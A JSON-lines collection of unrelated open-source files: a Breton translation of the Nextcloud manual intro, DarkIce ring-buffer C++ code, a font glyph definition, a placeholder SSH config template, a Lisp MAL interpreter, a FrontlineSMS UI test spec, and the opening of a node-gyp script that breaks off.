{"text": "# SOME DESCRIPTIVE TITLE.\n# Copyright (C) 2020 Nextcloud GmbH\n# This file is distributed under the same license as the Nextcloud latest User Manual package.\n# FIRST AUTHOR , YEAR.\n# \n# Translators:\n# Pierre Ozoux , 2020\n# Kervoas-Le Nabat Ewen , 2020\n# \n#, fuzzy\nmsgid \"\"\nmsgstr \"\"\n\"Project-Id-Version: Nextcloud latest User Manual latest\\n\"\n\"Report-Msgid-Bugs-To: \\n\"\n\"POT-Creation-Date: 2020-07-31 17:04+0000\\n\"\n\"PO-Revision-Date: 2020-07-27 12:48+0000\\n\"\n\"Last-Translator: Kervoas-Le Nabat Ewen , 2020\\n\"\n\"Language-Team: Breton (https://www.transifex.com/nextcloud/teams/64236/br/)\\n\"\n\"MIME-Version: 1.0\\n\"\n\"Content-Type: text/plain; charset=UTF-8\\n\"\n\"Content-Transfer-Encoding: 8bit\\n\"\n\"Language: br\\n\"\n\"Plural-Forms: nplurals=5; plural=((n%10 == 1) && (n%100 != 11) && (n%100 !=71) && (n%100 !=91) ? 0 :(n%10 == 2) && (n%100 != 12) && (n%100 !=72) && (n%100 !=92) ? 1 :(n%10 ==3 || n%10==4 || n%10==9) && (n%100 < 10 || n% 100 > 19) && (n%100 < 70 || n%100 > 79) && (n%100 < 90 || n%100 > 99) ? 2 :(n != 0 && n % 1000000 == 0) ? 3 : 4);\\n\"\n\n#: ../../index.rst:5\nmsgid \"Nextcloud |version| user manual introduction\"\nmsgstr \"Dornlevr ambroug an implijer evit Nextcloud |stumm|\"\n\n#: ../../index.rst:7\nmsgid \"**Welcome to Nextcloud: A safe home for all your data.**\"\nmsgstr \"**Donemat war Nextcloud : Ul lec'h sur evit tout ho roadennoù.**\"\n\n#: ../../index.rst:9\nmsgid \"\"\n\"Nextcloud is open source file sync and share software for everyone from \"\n\"individuals operating the free Nextcloud Server in the privacy of their own \"\n\"home, to large enterprises and service providers supported by the Nextcloud \"\n\"Enterprise Subscription. Nextcloud provides a safe, secure, and compliant \"\n\"file synchronization and sharing solution on servers that you control.\"\nmsgstr \"\"\n\"Nextcloud a zo ur c'hempreder ha ranner restr open source evit an dud a \"\n\"implij Servijourien Nextcloud en o zi, betek an embregerezhioù douget gant \"\n\"Nextcloud Enterprise Subscription. Nextcloud a ro ur c'hempredañ restroù sur\"\n\" hag aes, hag un doare rannañ war ur servijour kontrolet ganeoc'h.\"\n\n#: ../../index.rst:15\nmsgid \"\"\n\"You can share one or more files and folders on your computer, and \"\n\"synchronize them with your Nextcloud server. Place files in your local \"\n\"shared directories, and those files are immediately synchronized to the \"\n\"server and to other devices using the Nextcloud Desktop Sync Client, Android\"\n\" app, or iOS app. To learn more about the Nextcloud desktop and mobile \"\n\"clients, please refer to their respective manuals:\"\nmsgstr \"\"\n\"Posupl eo deoc'h enrollañ meur a restr ha teuliad war hoc'h urzhiataer, ha \"\n\"kemprendañ anezho gant ar servijour Nextcloud. Lakait ar restroù en ho \"\n\"teuliadoù kempredet war hoc'h urzhiataer, ha kempredet a vo ar restroù en un\"\n\" doare otomatik war ar servijour ha war an ardivinkoù a implij ar C'hliant \"\n\"Kemprendañ Burev Nextcloud, ar meziant Android, pe ar meziant iOS. Evit \"\n\"deskiñ muioc'h diwar-benn ar c'hliant burev Nextcloud hag hezoug, sellit \"\n\"ouzh an dornlevrioù mañ :\"\n\n#: ../../index.rst:22\nmsgid \"`Nextcloud Desktop Client`_\"\nmsgstr \"'Burev kliant Nextcloud'\"\n\n#: ../../index.rst:23\nmsgid \"`Nextcloud Android App`_\"\nmsgstr \"'Meziant Android Nextcloud'\"\n\n#: ../../index.rst:28\nmsgid \"\"\n\"`Help translate `_.\"\nmsgstr \"\"\n\"`Sikourit an treiñ `_.\"\n"} {"text": "/*------------------------------------------------------------------------------\n\n Copyright (c) 2000 Tyrell Corporation. All rights reserved.\n\n Tyrell DarkIce\n\n File : BufferedSink.cpp\n Version : $Revision$\n Author : $Author$\n Location : $Source$\n \n the buffer is filled like this:\n \n buffer bufferEnd\n | |\n +----------+--------------------------+--------------+\n |<---- valid data -------->|\n outp inp \n\n buffer bufferEnd\n | |\n +----------------+--------------+--------------------+\n -- valid data -->| |--- valid data ----->\n inp outp\n\n\n\n Copyright notice:\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License \n as published by the Free Software Foundation; either version 2\n of the License, or (at your option) any later version.\n \n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of \n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n GNU General Public License for more details.\n \n You should have received a copy of the GNU General Public License\n along with this program; if not, write to the Free Software\n Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n\n------------------------------------------------------------------------------*/\n\n/* ============================================================ include files */\n\n#ifdef HAVE_CONFIG_H\n#include \"config.h\"\n#endif\n\n#ifdef HAVE_STRING_H\n#include \n#else\n#error need string.h\n#endif\n\n\n#include \"Exception.h\"\n#include \"BufferedSink.h\"\n\n\n/* =================================================== local data structures */\n\n\n/* ================================================ local constants & macros */\n\n/*------------------------------------------------------------------------------\n * File identity\n *----------------------------------------------------------------------------*/\nstatic const char fileid[] = \"$Id$\";\n\n\n/* =============================================== local function prototypes */\n\n\n/* ============================================================= module code */\n\n/*------------------------------------------------------------------------------\n * Initialize the object\n *----------------------------------------------------------------------------*/\nvoid\nBufferedSink :: init ( Sink * sink,\n unsigned int size,\n unsigned int chunkSize ) throw ( Exception )\n{\n if ( !sink ) {\n throw Exception( __FILE__, __LINE__, \"no sink\");\n }\n\n this->sink = sink; // create a reference\n this->chunkSize = chunkSize ? chunkSize : 1;\n this->bufferSize = size;\n // make bufferSize a multiple of chunkSize\n this->bufferSize -= this->bufferSize % this->chunkSize;\n this->peak = 0;\n this->misalignment = 0;\n this->buffer = new unsigned char[bufferSize];\n this->bufferEnd = buffer + bufferSize;\n this->inp = buffer;\n this->outp = buffer;\n}\n\n\n/*------------------------------------------------------------------------------\n * Copy Constructor\n *----------------------------------------------------------------------------*/\nBufferedSink :: BufferedSink ( const BufferedSink & buffer )\n throw ( Exception )\n{\n init( buffer.sink.get(), buffer.bufferSize, buffer.chunkSize);\n\n this->peak = buffer.peak;\n this->misalignment = buffer.misalignment;\n memcpy( this->buffer, buffer.buffer, this->bufferSize);\n}\n\n\n/*------------------------------------------------------------------------------\n * De-initalize the object\n *----------------------------------------------------------------------------*/\nvoid\nBufferedSink :: strip ( void ) throw ( Exception )\n{\n if ( isOpen() ) {\n close();\n }\n\n sink = 0; // delete the reference\n delete buffer;\n}\n\n\n/*------------------------------------------------------------------------------\n * Assignment operator\n *----------------------------------------------------------------------------*/\nBufferedSink &\nBufferedSink :: operator= ( const BufferedSink & buffer )\n throw ( Exception )\n{\n if ( this != &buffer ) {\n strip();\n Sink::operator=( buffer );\n init( buffer.sink.get(), buffer.bufferSize, buffer.chunkSize);\n \n this->peak = buffer.peak;\n this->misalignment = buffer.misalignment;\n memcpy( this->buffer, buffer.buffer, this->bufferSize);\n }\n\n return *this;\n}\n\n\n/*------------------------------------------------------------------------------\n * Store bufferSize bytes into the buffer\n * All data is consumed. The return value is less then bufferSize only\n * if the BufferedSink's internal buffer is smaller than bufferSize,\n * thus can't hold that much\n * The data to be stored is treated as parts with chunkSize size\n * Only full chunkSize sized parts are stored\n *----------------------------------------------------------------------------*/\nunsigned int\nBufferedSink :: store ( const void * buffer,\n unsigned int bufferSize ) throw ( Exception )\n{\n const unsigned char * buf;\n unsigned int size;\n unsigned int i;\n unsigned char * oldInp;\n\n if ( !buffer ) {\n throw Exception( __FILE__, __LINE__, \"buffer is null\");\n }\n\n if ( !bufferSize ) {\n return 0;\n }\n\n oldInp = inp;\n buf = (const unsigned char *) buffer;\n \n // adjust so it is a multiple of chunkSize\n bufferSize -= bufferSize % chunkSize;\n\n // cut the front of the supplied buffer if it wouldn't fit\n if ( bufferSize > this->bufferSize ) {\n size = this->bufferSize - 1;\n size -= size % chunkSize; // keep it a multiple of chunkSize\n buf += bufferSize - size;\n } else {\n size = bufferSize;\n }\n\n // copy the data into the buffer\n i = bufferEnd - inp;\n if ( (i % chunkSize) != 0 ) {\n throw Exception( __FILE__, __LINE__, \"copy quantity not aligned\", i);\n }\n\n if ( size <= i ) {\n // the place between inp and bufferEnd is\n // big enough to hold the data\n \n memcpy( inp, buf, size);\n inp = slidePointer( inp, size);\n\n // adjust outp, lose the data that was overwritten, if any\n if ( outp > oldInp && outp <= inp ) {\n outp = slidePointer( inp, chunkSize);\n }\n\n } else {\n // the place between inp and bufferEnd is not\n // big enough to hold the data\n // writing will take place in two turns, once from\n // inp -> bufferEnd, then from buffer ->\n\n memcpy( inp, buf, i);\n i = size - i;\n if ( (i % chunkSize) != 0 ) {\n throw Exception(__FILE__, __LINE__, \"copy quantity not aligned\", i);\n }\n memcpy( this->buffer, buf, i);\n inp = slidePointer( this->buffer, i);\n \n // adjust outp, lose the data that was overwritten, if any\n if ( outp <= oldInp ) {\n if ( outp < inp ) {\n outp = slidePointer( inp, chunkSize);\n }\n } else {\n outp = slidePointer( inp, chunkSize);\n }\n }\n\n updatePeak();\n\n if ( ((inp - this->buffer) % chunkSize) != 0 ) {\n throw Exception( __FILE__, __LINE__,\n \"inp not aligned\", inp - this->buffer);\n }\n if ( ((outp - this->buffer) % chunkSize) != 0 ) {\n throw Exception( __FILE__, __LINE__,\n \"outp not aligned\", outp - this->buffer);\n }\n\n return size;\n}\n\n\n/*------------------------------------------------------------------------------\n * Write some data to the sink\n * if len == 0, try to flush the buffer\n *----------------------------------------------------------------------------*/\nunsigned int\nBufferedSink :: write ( const void * buf,\n unsigned int len ) throw ( Exception )\n{\n unsigned int length;\n unsigned int soFar;\n unsigned char * b = (unsigned char *) buf;\n\n if ( !buf ) {\n throw Exception( __FILE__, __LINE__, \"buf is null\");\n }\n\n if ( !isOpen() ) {\n return 0;\n }\n\n if ( !align() ) {\n return 0;\n }\n\n // make it a multiple of chunkSize\n len -= len % chunkSize;\n\n // try to write data from the buffer first, if any\n if ( inp != outp ) {\n unsigned int size = 0;\n unsigned int total = 0;\n\n if ( outp > inp ) {\n // valuable data is between outp -> bufferEnd and buffer -> inp\n // try to write the outp -> bufferEnd\n // the rest will be written in the next if\n\n size = bufferEnd - outp - 1;\n size -= size % chunkSize;\n soFar = 0;\n\n while ( outp > inp && soFar < size && sink->canWrite( 0, 0) ) {\n length = sink->write( outp + soFar, size - soFar);\n outp = slidePointer( outp, length);\n soFar += length;\n }\n\n total += soFar;\n }\n\n if ( outp < inp ) {\n // valuable data is between outp and inp\n // in the previous if wrote all data from the end\n // this part will write the rest\n\n size = inp - outp;\n soFar = 0;\n\n while ( soFar < size && sink->canWrite( 0, 0) ) {\n length = sink->write( outp + soFar, size - soFar);\n outp = slidePointer( outp, length);\n soFar += length;\n }\n\n total += soFar;\n }\n\n while ( (outp - buffer) % chunkSize ) {\n slidePointer( outp, 1);\n }\n\n // calulate the misalignment to chunkSize boundaries\n misalignment = (chunkSize - (total % chunkSize)) % chunkSize;\n }\n\n if ( !align() ) {\n return 0;\n }\n\n // the internal buffer is empty, try to write the fresh data\n soFar = 0;\n if ( inp != outp ) {\n while ( soFar < len && sink->canWrite( 0, 0) ) {\n soFar += sink->write( b + soFar, len - soFar);\n }\n }\n length = soFar;\n\n // calulate the misalignment to chunkSize boundaries\n misalignment = (chunkSize - (length % chunkSize)) % chunkSize;\n\n if ( length < len ) {\n // if not all fresh could be written, store the remains\n\n store( b + length, len - length);\n }\n\n // tell them we ate everything up to chunkSize alignment\n return len;\n}\n\n\n/*------------------------------------------------------------------------------\n * Close the sink, lose all pending data\n *----------------------------------------------------------------------------*/\nvoid\nBufferedSink :: close ( void ) throw ( Exception )\n{\n if ( !isOpen() ) {\n return;\n }\n\n flush();\n sink->close();\n inp = outp = buffer;\n}\n\n\n/*------------------------------------------------------------------------------\n \n $Source$\n\n $Log$\n Revision 1.6 2002/10/19 12:21:28 darkeye\n fixed comment typo\n\n Revision 1.5 2001/08/30 17:25:56 darkeye\n renamed configure.h to config.h\n\n Revision 1.4 2000/11/11 12:33:13 darkeye\n added kdoc-style documentation\n\n Revision 1.3 2000/11/10 20:16:21 darkeye\n first real tests with multiple streaming\n\n Revision 1.2 2000/11/05 14:08:27 darkeye\n changed builting to an automake / autoconf environment\n\n Revision 1.1.1.1 2000/11/05 10:05:48 darkeye\n initial version\n\n \n------------------------------------------------------------------------------*/\n\n"} {"text": "StartChar: seven.propold\nEncoding: 65546 -1 90\nWidth: 450\nFlags: W\nTtInstrs:\nSVTCA[y-axis]\nPUSHW_1\n 2\nMDAP[rnd]\nPUSHW_1\n 0\nRCVT\nIF\nPUSHW_1\n 1\nMDAP[rnd]\nELSE\nPUSHW_2\n 1\n 2\nMIAP[no-rnd]\nEIF\nPUSHW_1\n 0\nRCVT\nIF\nPUSHW_1\n 4\nMDAP[rnd]\nELSE\nPUSHW_2\n 4\n 2\nMIAP[no-rnd]\nEIF\nPUSHW_1\n 1\nSRP0\nPUSHW_1\n 0\nMDRP[rp0,min,rnd,grey]\nPUSHW_1\n 6\nMDRP[rp0,grey]\nIUP[y]\nIUP[x]\nEndTTInstrs\nLayerCount: 2\nFore\nSplineSet\n490 586 m 1,0,-1\n 479 481 l 1,1,-1\n 154 -105 l 1,2,-1\n 20 -105 l 1,3,-1\n 367 480 l 1,4,-1\n 67 480 l 1,5,-1\n 76 586 l 1,6,-1\n 490 586 l 1,0,-1\nEndSplineSet\nEndChar\n"} {"text": "\"\"\"\nThis config file would have the credentials of remote server,\nthe commands to execute, upload and download file path details.\n\"\"\"\n#Server credential details needed for ssh\nHOST='Enter your host details here'\nUSERNAME='Enter your username here'\nPASSWORD='Enter your password here'\nPORT = 22\nTIMEOUT = 10\n\n#.pem file details\nPKEY = 'Enter your key filename here'\n\n#Sample commands to execute(Add your commands here)\nCOMMANDS = ['ls;mkdir sample']\n\n#Sample file locations to upload and download\nUPLOADREMOTEFILEPATH = '/etc/example/filename.txt'\nUPLOADLOCALFILEPATH = 'home/filename.txt'\nDOWNLOADREMOTEFILEPATH = '/etc/sample/data.txt'\nDOWNLOADLOCALFILEPATH = 'home/data.txt'\n"} {"text": "(de load-relative (Path)\n (load (pack (car (file)) Path)) )\n\n(load-relative \"readline.l\")\n(load-relative \"types.l\")\n(load-relative \"reader.l\")\n(load-relative \"printer.l\")\n(load-relative \"env.l\")\n(load-relative \"func.l\")\n(load-relative \"core.l\")\n\n(de READ (String)\n (read-str String) )\n\n(def '*ReplEnv (MAL-env NIL))\n(for Bind *Ns (set> *ReplEnv (car Bind) (cdr Bind)))\n\n(de starts-with (Ast Sym) ;; MAL list, symbol -> nil or second element of Ast\n (let (L (MAL-value Ast)\n A0 (car L))\n (and (= (MAL-type A0) 'symbol)\n (= (MAL-value A0) Sym)\n (cadr L))))\n\n(de quasiquote-loop (Xs) ;; list -> MAL list\n (MAL-list\n (when Xs\n (let (Elt (car Xs)\n Unq (when (= (MAL-type Elt) 'list)\n (starts-with Elt 'splice-unquote))\n Acc (quasiquote-loop (cdr Xs)))\n (if Unq\n (list (MAL-symbol 'concat) Unq Acc)\n (list (MAL-symbol 'cons) (quasiquote Elt) Acc))))))\n\n(de quasiquote (Ast)\n (case (MAL-type Ast)\n (list (or (starts-with Ast 'unquote)\n (quasiquote-loop (MAL-value Ast))))\n (vector (MAL-list (list (MAL-symbol 'vec) (quasiquote-loop (MAL-value Ast)))))\n ((map symbol) (MAL-list (list (MAL-symbol 'quote) Ast)))\n (T Ast)))\n\n(de is-macro-call (Ast Env)\n (when (= (MAL-type Ast) 'list)\n (let A0 (car (MAL-value Ast))\n (when (= (MAL-type A0) 'symbol)\n (let Value (find> Env (MAL-value A0))\n (and (isa '+Func Value) (get Value 'is-macro) T) ) ) ) ) )\n\n(de macroexpand (Ast Env)\n (while (is-macro-call Ast Env)\n (let (Ast* (MAL-value Ast)\n Macro (get (find> Env (MAL-value (car Ast*))) 'fn)\n Args (cdr Ast*) )\n (setq Ast (apply (MAL-value Macro) Args)) ) )\n Ast )\n\n(de EVAL (Ast Env)\n (catch 'done\n (while t\n (when (not (= (MAL-type Ast) 'list))\n (throw 'done (eval-ast Ast Env)) )\n (setq Ast (macroexpand Ast Env))\n (when (or (not (= (MAL-type Ast) 'list)) (not (MAL-value Ast)))\n (throw 'done (eval-ast Ast Env)) )\n (let (Ast* (MAL-value Ast)\n A0* (MAL-value (car Ast*))\n A1 (cadr Ast*)\n A1* (MAL-value A1)\n A2 (caddr Ast*)\n A3 (cadddr Ast*) )\n (cond\n ((= A0* 'def!)\n (throw 'done (set> Env A1* (EVAL A2 Env))) )\n ((= A0* 'quote)\n (throw 'done A1) )\n ((= A0* 'quasiquoteexpand)\n (throw 'done (quasiquote A1)))\n ((= A0* 'quasiquote)\n (setq Ast (quasiquote A1)) ) # TCO\n ((= A0* 'defmacro!)\n (let Form (EVAL A2 Env)\n (put Form 'is-macro T)\n (throw 'done (set> Env A1* Form)) ) )\n ((= A0* 'macroexpand)\n (throw 'done (macroexpand A1 Env)) )\n ((= A0* 'let*)\n (let Env* (MAL-env Env)\n (for (Bindings A1* Bindings)\n (let (Key (MAL-value (pop 'Bindings))\n Value (EVAL (pop 'Bindings) Env*) )\n (set> Env* Key Value) ) )\n (setq Env Env* Ast A2) ) ) # TCO\n ((= A0* 'do)\n (mapc '((Form) (EVAL Form Env)) (head -1 (cdr Ast*)))\n (setq Ast (last Ast*)) ) # TCO\n ((= A0* 'if)\n (if (not (memq (MAL-type (EVAL A1 Env)) '(nil false)))\n (setq Ast A2) # TCO\n (if A3\n (setq Ast A3) # TCO\n (throw 'done *MAL-nil) ) ) )\n ((= A0* 'fn*)\n (let (Binds (mapcar MAL-value A1*)\n Body A2\n Fn (MAL-fn\n (curry (Env Binds Body) @\n (let Env* (MAL-env Env Binds (rest))\n (EVAL Body Env*) ) ) ) )\n (throw 'done (MAL-func Env Body Binds Fn)) ) )\n (T\n (let (Ast* (MAL-value (eval-ast Ast Env))\n Fn (car Ast*)\n Args (cdr Ast*) )\n (if (isa '+MALFn Fn)\n (throw 'done (apply (MAL-value Fn) Args))\n (let Env* (MAL-env (get Fn 'env) (get Fn 'params) Args)\n (setq Ast (get Fn 'ast) Env Env*) ) ) ) ) ) ) ) ) )\n\n(de eval-ast (Ast Env)\n (let Value (MAL-value Ast)\n (case (MAL-type Ast)\n (symbol (get> Env Value))\n (list (MAL-list (mapcar '((Form) (EVAL Form Env)) Value)))\n (vector (MAL-vector (mapcar '((Form) (EVAL Form Env)) Value)))\n (map (MAL-map (mapcar '((Form) (EVAL Form Env)) Value)))\n (T Ast) ) ) )\n\n(set> *ReplEnv 'eval (MAL-fn (curry (*ReplEnv) (Form) (EVAL Form *ReplEnv))))\n(set> *ReplEnv '*ARGV* (MAL-list (mapcar MAL-string (cdr (argv)))))\n\n(de PRINT (Ast)\n (pr-str Ast T) )\n\n(de rep (String)\n (PRINT (EVAL (READ String) *ReplEnv)) )\n\n(rep \"(def! not (fn* (a) (if a false true)))\")\n(rep \"(def! load-file (fn* (f) (eval (read-string (str \\\"(do \\\" (slurp f) \\\"\\nnil)\\\")))))\")\n(rep \"(defmacro! cond (fn* (& xs) (if (> (count xs) 0) (list 'if (first xs) (if (> (count xs) 1) (nth xs 1) (throw \\\"odd number of forms to cond\\\")) (cons 'cond (rest (rest xs)))))))\")\n\n\n(load-history \".mal_history\")\n\n(if (argv)\n (rep (pack \"(load-file \\\"\" (car (argv)) \"\\\")\"))\n (use Input\n (until (=0 (setq Input (readline \"user> \")))\n (let Output (catch 'err (rep Input))\n (if (isa '+MALError Output)\n (let Message (MAL-value Output)\n (unless (= (MAL-value Message) \"end of token stream\")\n (prinl \"[error] \" (pr-str Message)) ) )\n (prinl Output) ) ) ) ) )\n\n(prinl)\n(bye)\n"} {"text": "package frontlinesms2.webconnection\n\nimport frontlinesms2.*\nimport frontlinesms2.message.*\nimport frontlinesms2.popup.*\nimport frontlinesms2.announcement.*\n\nimport spock.lang.*\n\nclass WebconnectionViewSpec extends WebconnectionBaseSpec {\n\tdef setup() {\n\t\tcreateWebconnections()\n\t\tcreateTestActivities()\n\t\tdef wcId = remote { Webconnection.findByName(\"Sync\").id }\n\t\tcreateTestMessages(wcId)\n\t}\n\n\tdef \"Webconnection page should show the details of a generic Webconnection in the header\"() {\n\t\tsetup:\n\t\t\tdef webconnectionName = remote { Webconnection.findByName(\"Sync\").name }\n\t\twhen:\n\t\t\tto PageMessageWebconnection, webconnectionName\n\t\tthen:\n\t\t\twaitFor { title == 'webconnection.title[Sync]' }\n\t\t\theader.name == 'webconnection.title[sync]'\n\t\t\theader.url == 'http://www.frontlinesms.com/sync'\n\t\t\theader.sendMethod == 'get'\n\t\t\theader.subtitle == 'webconnection.generic.subtitle[generic]'\n\t\t\theader.api == 'webconnection.api.url : (webconnection.api.disabled)'\n\t}\n\n\t@Unroll\n\tdef 'Webconnection page should show API url, excluding secret, iff API is enabled'() {\n\t\tsetup:\n\t\t\tdef webconnectionName = remote { GenericWebconnection.build(name:'me', apiEnabled:true, secret:secret, url:'http://test.com').name }\n\t\t\tdef wcId = remote { GenericWebconnection.findByName('me').id }\n\t\twhen:\n\t\t\tto PageMessageWebconnection, webconnectionName\n\t\tthen:\n\t\t\theader.api.endsWith \"/api/1/webconnection/$wcId\"\n\t\twhere:\n\t\t\tsecret << [null, 'imagine']\n\t}\n\n\tdef \"Webconnection page should show the details of an Ushahidi Webconnection in the header\"() {\n\t\tsetup:\n\t\t\tdef webconnectionName = remote { Webconnection.findByName(\"Ush\").name }\n\t\twhen:\n\t\t\tto PageMessageWebconnection, webconnectionName\n\t\tthen:\n\t\t\twaitFor { title == 'webconnection.title[Ush]' }\n\t\t\theader.name == 'webconnection.title[ush]'\n\t\t\theader.url == 'http://www.ushahidi.com/frontlinesms'\n\t\t\theader.sendMethod == 'get'\n\t\t\theader.subtitle == 'webconnection.ushahidi.subtitle[ushahidi]'\n\t}\n\n\tdef \"clicking the archive button archives the Webconnection and redirects to inbox \"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { header.displayed }\n\t\twhen:\n\t\t\theader.archive.click()\n\t\tthen:\n\t\t\twaitFor { at PageMessageInbox }\n\t\t\tnotifications.flashMessageText == 'default.archived[activity.label]'\n\t}\n\n\tdef \"clicking the edit option opens the Webconnection Dialog for editing\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { header.displayed }\n\t\twhen:\n\t\t\theader.moreActions.value(\"edit\").jquery.click()\n\t\tthen:\n\t\t\twaitFor(\"veryslow\") { at WebconnectionWizard }\n\t}\n\n\tdef \"Clicking the Send Message button brings up the Quick Message Dialog\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\t\twaitFor { header.quickMessage.displayed }\n\t\t\theader.quickMessage.click()\n\t\tthen:\n\t\t\twaitFor('veryslow'){ at QuickMessageDialog }\n\t\t\twaitFor{ textArea.displayed }\n\t}\n\n\tdef \"clicking the rename option opens the rename small popup\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { header.displayed }\n\t\twhen:\n\t\t\theader.moreActions.value(\"rename\").jquery.click()\n\t\tthen:\n\t\t\twaitFor { at RenameDialog }\n\t\t\tname.jquery.val().contains(\"Sync\")\n\t}\n\n\tdef \"clicking the delete option opens the confirm delete small popup\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { header.displayed }\n\t\twhen:\n\t\t\theader.moreActions.value(\"delete\").jquery.click()\n\t\tthen:\n\t\t\twaitFor { at DeleteActivity }\n\t}\n\n\tdef \"clicking the export option opens the export dialog\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { header.displayed }\n\t\twhen:\n\t\t\theader.moreActions.value(\"export\").jquery.click()\n\t\tthen:\n\t\t\twaitFor { at ExportDialog }\n\t}\n\n\tdef \"selecting a single message reveals the single message view\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(0)\n\t\tthen:\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\t\twaitFor { singleMessageDetails.text == \"Test message 0\" }\n\t}\n\n\tdef \"selecting multiple messages reveals the multiple message view\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(0)\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\t\tmessageList.toggleSelect(1)\n\t\tthen:\n\t\t\twaitFor { multipleMessageDetails.displayed }\n\t\t\tmultipleMessageDetails.checkedMessageCount == 2\n\t}\n\n\tdef \"clicking on a message reveals the single message view with clicked message\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(3)\n\t\tthen:\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\t\tmessageList.hasClass(3, \"selected\")\n\t\t\twaitFor { singleMessageDetails.text == \"Test message 3\" }\n\t}\n\n\tdef \"delete single message action works \"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(0)\n\t\tthen:\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\twhen:\n\t\t\tsingleMessageDetails.delete.click()\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\t\tmessageList.messageText(0) != 'Test message 0'\n\t}\n\n\tdef \"delete multiple message action works for multiple select\"(){\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(0)\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\t\tmessageList.toggleSelect(1)\n\t\tthen:\n\t\t\twaitFor { multipleMessageDetails.displayed }\n\t\twhen:\n\t\t\tmultipleMessageDetails.deleteAll.click()\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\t\t!(messageList.messageText(0) in ['Test message 0', 'Test message 1'])\n\t\t\t!(messageList.messageText(1) in ['Test message 0', 'Test message 1'])\n\t}\n\n\tdef \"move single message action works\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(0)\n\t\tthen:\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\t\twaitFor { singleMessageDetails.text == \"Test message 0\" }\n\t\twhen:\n\t\t\tsingleMessageDetails.moveTo(remote { Activity.findByName(\"Sample Announcement\").id }).click()\n\t\tthen:\n\t\t\twaitFor(\"veryslow\") { at PageMessageWebconnection }\n\t\t\twaitFor { notifications.flashMessageText.contains(\"updated\") }\n\t\t\tmessageList.messageText(0) != 'Test message 0'\n\t\twhen:\n\t\t\tto PageMessageAnnouncement, \"Sample Announcement\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\t\tmessageList.messageText(0) == 'Test message 0'\n\t}\n\n\tdef \"move multiple message action works\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(0)\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\t\tmessageList.toggleSelect(1)\n\t\tthen:\n\t\t\twaitFor { multipleMessageDetails.displayed }\n\t\twhen:\n\t\t\tmultipleMessageDetails.moveTo(remote { Activity.findByName(\"Sample Announcement\").id }).click()\n\t\tthen:\n\t\t\twaitFor(\"veryslow\") { notifications.flashMessageText.contains(\"updated\") }\n\t\t\t!(messageList.messageText(0) in ['Test message 0', 'Test message 1'])\n\t\t\t!(messageList.messageText(1) in ['Test message 0', 'Test message 1'])\n\t\twhen:\n\t\t\tto PageMessageAnnouncement, \"Sample Announcement\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\t\tmessageList.messageText(0) in ['Test message 0', 'Test message 1']\n\t\t\tmessageList.messageText(1) in ['Test message 0', 'Test message 1']\n\t}\n\n\tdef \"should display SENT message status for successfully forwarded messages\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\t\tjs.exec '''\n\t\t\t\treturn $(\"#main-list tbody tr.ownerdetail-webconnection-SENT\").size() > 0\n\t\t\t'''\n\t}\n\n\tdef \"retry failed uploads option should be present in more actions dropdown, and should redirect to same view\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { header.displayed }\n\t\twhen:\n\t\t\theader.moreActions.value('retryFailed')\n\t\tthen:\n\t\t\twaitFor { notifications.flashMessageText == 'webconnection.failed.retried' }\n\t\t\tat PageMessageWebconnection\n\t}\n}\n\n"} {"text": "var semver = require('semver')\n , url = require('url')\n , path = require('path')\n , log = require('npmlog')\n\n // versions where -headers.tar.gz started shipping\n , headersTarballRange = '>= 3.0.0 || ~0.12.10 || ~0.10.42'\n , bitsre = /\\/win-(x86|x64)\\//\n , 